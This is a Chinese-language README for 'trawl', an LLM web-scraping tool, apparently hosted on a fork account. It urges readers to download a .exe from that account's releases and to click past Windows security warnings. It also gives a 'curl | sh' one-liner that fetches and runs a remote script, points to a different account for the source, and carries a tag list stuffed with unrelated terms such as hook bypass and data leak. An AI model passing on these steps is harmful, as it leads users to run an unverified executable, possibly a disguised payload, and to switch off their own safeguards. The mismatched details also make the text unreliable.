teamn9636/trawl
GitHub: teamn9636/trawl
一款基于大语言模型的智能网页数据提取工具,无需编写选择器即可自动从网站抓取结构化数据并适应页面变更。
Stars: 0 | Forks: 0
# 🐟 trawl - 轻松提取网站数据
[](https://github.com/teamn9636/trawl/releases)

## 📋 什么是 trawl?
Trawl 是一个从任何网站提取结构化数据的工具。你只需告诉它你想要*什么*信息,而不是*如何*找到这些信息。当网站发生变化时,trawl 会自动调整以持续准确地获取数据。它运行速度快,且不需要为每个页面额外调用 API。
你不需要知道如何编写 CSS 选择器或代码。只需提供简单的指令,剩下的工作交给 trawl 即可。
## 🖥️ 系统要求
Trawl 可在 Windows 10 及更新版本上运行。你的电脑应具备:
- 64 位处理器
- 至少 4 GB 内存 (RAM)
- 500 MB 的可用磁盘空间
你还需要互联网连接来下载和运行程序,并允许其访问网站以提取数据。
## 📥 下载和安装
[](https://github.com/teamn9636/trawl/releases)
要在 Windows 上开始使用 trawl,请访问下面的发布页面。页面会显示可供下载的最新版本。
**前往此处下载:**
https://github.com/teamn9636/trawl/releases
寻找以 `.exe` 结尾的文件(这是 Windows 安装程序或可执行文件)。点击它进行下载。
### 如何在 Windows 上运行 trawl
1. 从发布页面下载 `.exe` 文件。
2. 在你的下载文件夹中找到已下载的文件。
3. 双击文件打开。如果弹出安全警告,请选择“运行”或“更多信息”,然后选择“仍要运行”。
4. 程序将在新窗口或命令提示符中打开。
运行 trawl 不需要安装额外的软件,但在其运行后,你需要打开命令提示符(或 PowerShell)。
## 🚀 trawl 入门指南
按照以下步骤从网站提取数据。
### 步骤 1:打开命令提示符
- 按下 Windows 键。
- 输入 `cmd` 并按回车键。这将打开一个名为命令提示符的黑色窗口。
### 步骤 2:设置你的 API key
Trawl 使用大语言模型 (LLM) 来确定要提取的正确数据。你需要添加来自你 API 提供商的密钥。
根据你使用的 AI 平台,输入以下命令(将 `YOUR_API_KEY` 替换为你的真实密钥):
对于 Google Gemini:
```
set GOOGLE_GEMINI_APIKEY=YOUR_API_KEY
```
对于 Anthropic:
```
set ANTHROPIC_API_KEY=YOUR_API_KEY
```
按回车键为当前会话保存密钥。
### 步骤 3:使用网站 URL 运行 trawl
输入如下简单的命令来获取产品信息:
```
trawl "https://books.toscrape.com" --fields "title, price, rating, in_stock"
```
此命令要求 trawl 从示例网站获取产品标题、价格、评分和库存信息。
### 步骤 4:将输出保存为 CSV(可选)
如果你希望结果保存为 CSV 文件(便于在 Excel 中打开),请添加此标志 (flag):
```
trawl "https://books.toscrape.com" --fields "title, price, rating, in_stock" --csv > products.csv
```
这会将输出保存到你运行命令的文件夹中名为 `products.csv` 的文件里。
## 🛠️ 功能一览
- 无需编写代码或 CSS 选择器。
- 网站更改时自动适应。
- 初始设置后运行速度快。
- 对每种网站布局仅使用一次 AI,节省时间和 API 用量。
- 完全在你的电脑上运行,确保数据抓取稳定。
- 支持输出为 JSON 和 CSV 格式。
- 适用于多种类型的网站和数据。
## 🔧 更多安装方式(面向高级用户)
如果你想以不同方式使用 trawl,可以通过其他方法安装或构建。
- 在 PowerShell 中运行此命令进行安装:
```
curl -fsSL https://raw.githubusercontent.com/akdavidsson/trawl/main/install.sh | sh
```
- 或者,如果你安装了 Go 编程语言,请运行:
```
go install github.com/akdavidsson/trawl@latest
```
- 从源代码构建:
```
git clone https://github.com/akdavidsson/trawl
cd trawl
go build -o trawl .
```
对于大多数用户来说,下载并运行 `.exe` 文件是最简单的方法。
## 🤔 故障排除与技巧
- 如果命令行提示“command not found”(找不到命令),请确保你是从 trawl 所在的文件夹运行命令,或者将 trawl 添加到系统 PATH 中。
- 除非将 API key 添加到系统环境变量中,否则每次打开命令提示符时都必须设置它。
- 在网站 URL 和字段周围使用引号以避免错误。
- 先尝试简单的网站以熟悉命令操作。
- 如果提取结果看起来不对,请检查你的 API key 和网站 URL。
## 📚 了解更多
有关详细的说明和高级选项,请查看官方 GitHub 仓库:
https://github.com/teamn9636/trawl
[](https://github.com/teamn9636/trawl/releases)
标签:BSD, EVTX分析, Python, URL抓取, Web Scraping, Windows软件, 人工智能, 大模型, 数据抓取, 数据挖掘, 数据泄露, 数据清洗, 文档结构分析, 无后门, 日志审计, 用户模式Hook绕过, 结构化数据, 网页提取, 自适应抓取